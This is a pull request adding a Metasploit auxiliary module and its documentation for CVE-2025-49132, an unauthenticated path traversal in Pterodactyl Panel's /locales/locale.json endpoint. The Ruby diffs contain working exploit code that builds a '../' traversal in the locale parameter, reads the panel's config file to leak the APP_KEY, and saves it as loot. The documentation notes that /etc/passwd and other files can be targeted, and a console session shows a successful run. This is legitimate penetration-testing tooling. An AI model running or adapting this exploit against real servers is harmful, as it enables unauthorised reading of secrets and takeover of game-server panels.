### PR TITLE
Add auxiliary module for Pterodactyl Panel CVE-2025-49132

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
+++ b/documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 Pterodactyl Panel is an open-source game server management panel built with PHP, React, and Go.
-This module exploits a path traversal vulnerability (CVE-2025-49132) in Pterodactyl Panel versions prior to the fixed release.
+This module exploits a path traversal vulnerability (CVE-2025-49132) in Pterodactyl Panel versions prior to the fixed release: `v1.11.11 `.
 The vulnerability exists in the `/locales/locale.json` endpoint. It allows an unauthenticated attacker to manipulate the `locale` parameter to traverse directories and read arbitrary files on the server (e.g., configuration files containing sensitive keys).
 
 To set up a vulnerable environment, you can install an older version of Pterodactyl Panel using the standard installation scripts or Docker, ensuring you do not apply the patch for CVE-2025-49132.

--- a/documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
+++ b/documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
@@ -37,8 +37,6 @@ This scenario demonstrates reading the configuration file from a vulnerable Pter
 msf > use auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132
 msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
-msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > set RPORT 80
-RPORT => 80
 msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > set DEPTH 2
 DEPTH => 2
 msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > run

--- a/documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
+++ b/documentation/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.md
@@ -1,0 +1,49 @@
+## Vulnerable Application
+
+Pterodactyl Panel is an open-source game server management panel built with PHP, React, and Go.
+This module exploits a path traversal vulnerability (CVE-2025-49132) in Pterodactyl Panel versions prior to the fixed release.
+The vulnerability exists in the `/locales/locale.json` endpoint. It allows an unauthenticated attacker to manipulate the `locale` parameter to traverse directories and read arbitrary files on the server (e.g., configuration files containing sensitive keys).
+
+To set up a vulnerable environment, you can install an older version of Pterodactyl Panel using the standard installation scripts or Docker, ensuring you do not apply the patch for CVE-2025-49132.
+
+## Verification Steps
+
+1. Install the application.
+2. Start msfconsole.
+3. Do: `use auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132`
+4. Do: `set RHOSTS [ip]`
+5. Do: `set DEPTH [depth]` (default is 2, adjust based on installation path).
+6. Do: `run`
+7. You should see the module report the host as vulnerable and save the file content to loot.
+
+## Options
+
+### DEPTH
+
+The traversal depth required to reach the root directory.
+Defaults to `2`, which is sufficient for standard Pterodactyl installations where the path is relative to the `public` directory. If the application is deployed in a deeper subdirectory, increase this value.
+
+### FILE
+
+The specific file to retrieve from the target server.
+Defaults to `config`, which targets the Pterodactyl configuration file (often named `config` or `.env` depending on setup) to verify the vulnerability and leak the `APP_KEY`. Testers can change this to `/etc/passwd` or other sensitive files if the depth is adjusted accordingly.
+
+## Scenarios
+
+### Successful Scan on Pterodactyl Panel
+
+This scenario demonstrates reading the configuration file from a vulnerable Pterodactyl instance running locally.
+```
+msf > use auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132
+msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > set RPORT 80
+RPORT => 80
+msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > set DEPTH 2
+DEPTH => 2
+msf auxiliary(scanner/http/pterodactyl_traversal_cve_2025_49132) > run
+[+] 127.0.0.1:80 - Vulnerable! Found Pterodactyl configuration.
+[+] 127.0.0.1:80 - Config saved to: /root/.msf4/loot/20251216220817_default_127.0.0.1_pterodactyl.conf_821780.bin
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.rb
+++ b/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.rb
@@ -13,7 +13,12 @@ class MetasploitModule < Msf::Auxiliary
       update_info(
         info,
         'Name'           => 'Pterodactyl Panel Path Traversal (CVE-2025-49132)',
-        'Description'    => 'This module checks for the CVE-2025-49132 vulnerability in Pterodactyl Panel.',
+        'Description'    => %q{
+          This module exploits a path traversal vulnerability in Pterodactyl Panel.
+          The vulnerability exists in the /locales/locale.json endpoint, allowing
+          unauthenticated attackers to read arbitrary files on the server.
+          By default, it attempts to read the 'config' file to leak the APP_KEY.
+        },
         'Author'         => [ 'N05ec' ],
         'License'        => MSF_LICENSE,
         'References'     => [
@@ -30,48 +35,65 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The target URI', '/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app']),
-        OptString.new('METHOD', [true, 'HTTP Method', 'GET'])
+        OptString.new('TARGETURI', [true, 'The base path to the locale endpoint', '/locales/locale.json']),
+        OptInt.new('DEPTH', [true, 'The traversal depth', 2]),
+        OptString.new('FILE', [true, 'The file to read', 'config'])
       ]
     )
   end
 
   def run_host(ip)
-    begin
-      uri = normalize_uri(datastore['TARGETURI'])
+    traversal = '../' * datastore['DEPTH']
+    filename = datastore['FILE']
+    payload = "#{traversal}#{filename}"
 
-      res = send_request_cgi({
-        'method'  => datastore['METHOD'],
-        'uri'     => uri,
-        'headers' => {
-          'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
-        }
-      })
+    vprint_status("Attempting to retrieve #{filename} with depth #{datastore['DEPTH']}...")
 
-      if res && res.code == 200
-        print_good("Successfully connected to #{ip}")
-        vprint_status("Response: #{res.body}") 
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path),
+      'vars_get' => {
+        'locale'    => payload,
+        'namespace' => 'app'
+      }
+    })
 
-        if res.body.include?('{"app":{"version":') && res.body.include?('"key":"base64')
-          print_good("Vulnerable: #{ip}")
-          report_vuln(
-            host: ip,
-            name: self.name,
-            refs: self.references,
-            info: 'Host is vulnerable to CVE-2025-49132'
-          )
-        else
-          print_status("Not vulnerable: #{ip}")
-        end
-      else
-        print_error("Connection failed: #{res ? res.code : 'No response'}")
-      end
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("Connection failed")
-    rescue ::Errno::EPIPE, ::Errno::ECONNRESET
-      print_error("Connection reset")
-    rescue => e
-      print_error("Unexpected error: #{e.message}")
+    unless res
+      print_error("#{peer} - Connection failed (No response)")
+      return
     end
+
+    if res.code == 200
+      if res.body.include?('{"app":{"version":') && res.body.include?('"key":"base64')
+        print_good("#{peer} - Vulnerable! Found Pterodactyl configuration.")
+        
+        path = store_loot(
+          'pterodactyl.config',
+          'application/json',
+          ip,
+          res.body,
+          filename,
+          'Pterodactyl Panel Config'
+        )
+        print_good("#{peer} - Config saved to: #{path}")
+
+        report_vuln(
+          host: ip,
+          name: self.name,
+          refs: self.references,
+          info: "Retrieved #{filename} via CVE-2025-49132"
+        )
+      else
+        print_status("#{peer} - Connected (200 OK), but response did not contain expected config patterns.")
+        vprint_line(res.body)
+      end
+    else
+      print_error("#{peer} - Server responded with #{res.code}")
+    end
+
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    print_error("#{peer} - Connection failed")
+  rescue => e
+    print_error("#{peer} - Unexpected error: #{e.message}")
   end
 end

--- a/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.rb
+++ b/modules/auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132.rb
@@ -1,0 +1,77 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Pterodactyl Panel Path Traversal (CVE-2025-49132)',
+        'Description'    => 'This module checks for the CVE-2025-49132 vulnerability in Pterodactyl Panel.',
+        'Author'         => [ 'N05ec' ],
+        'License'        => MSF_LICENSE,
+        'References'     => [
+          ['CVE', '2025-49132']
+        ],
+        'DisclosureDate' => '2025-06-20',
+        'Notes'          => {
+          'Stability'   => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The target URI', '/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app']),
+        OptString.new('METHOD', [true, 'HTTP Method', 'GET'])
+      ]
+    )
+  end
+
+  def run_host(ip)
+    begin
+      uri = normalize_uri(datastore['TARGETURI'])
+
+      res = send_request_cgi({
+        'method'  => datastore['METHOD'],
+        'uri'     => uri,
+        'headers' => {
+          'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
+        }
+      })
+
+      if res && res.code == 200
+        print_good("Successfully connected to #{ip}")
+        vprint_status("Response: #{res.body}") 
+
+        if res.body.include?('{"app":{"version":') && res.body.include?('"key":"base64')
+          print_good("Vulnerable: #{ip}")
+          report_vuln(
+            host: ip,
+            name: self.name,
+            refs: self.references,
+            info: 'Host is vulnerable to CVE-2025-49132'
+          )
+        else
+          print_status("Not vulnerable: #{ip}")
+        end
+      else
+        print_error("Connection failed: #{res ? res.code : 'No response'}")
+      end
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error("Connection failed")
+    rescue ::Errno::EPIPE, ::Errno::ECONNRESET
+      print_error("Connection reset")
+    rescue => e
+      print_error("Unexpected error: #{e.message}")
+    end
+  end
+end


### PR DESCRIPTION
## Description
This PR adds an auxiliary scanner module for CVE-2025-49132, a path traversal vulnerability in Pterodactyl Panel. The vulnerability allows unauthenticated attackers to read the configuration file (including APP_KEY) via the `/locales/locale.json` endpoint.

## Verification
- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/pterodactyl_traversal_cve_2025_49132`
- [ ] `set RHOSTS <vulnerable_ip>`
- [ ] `run`
- [ ] Verify that the module detects the vulnerability and reports it.